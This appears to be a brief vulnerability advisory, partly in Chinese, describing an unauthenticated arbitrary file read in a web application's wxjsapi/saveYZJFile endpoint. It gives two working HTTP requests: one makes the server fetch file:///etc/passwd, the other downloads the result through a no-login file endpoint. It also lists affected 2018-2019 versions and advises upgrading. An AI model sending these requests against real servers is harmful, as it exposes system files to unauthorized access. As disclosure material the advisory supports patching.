GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */*
GET /file/fileNoLogin/xxxxxxxxxx HTTP/1.1 User-Agent: curl/7.29.0 Host: xxxxx Accept: */*
提交上一步響應包中的id
漏洞影響版本:
該漏洞幾乎影響2018-2019全版本
處置建議:
升級至最新版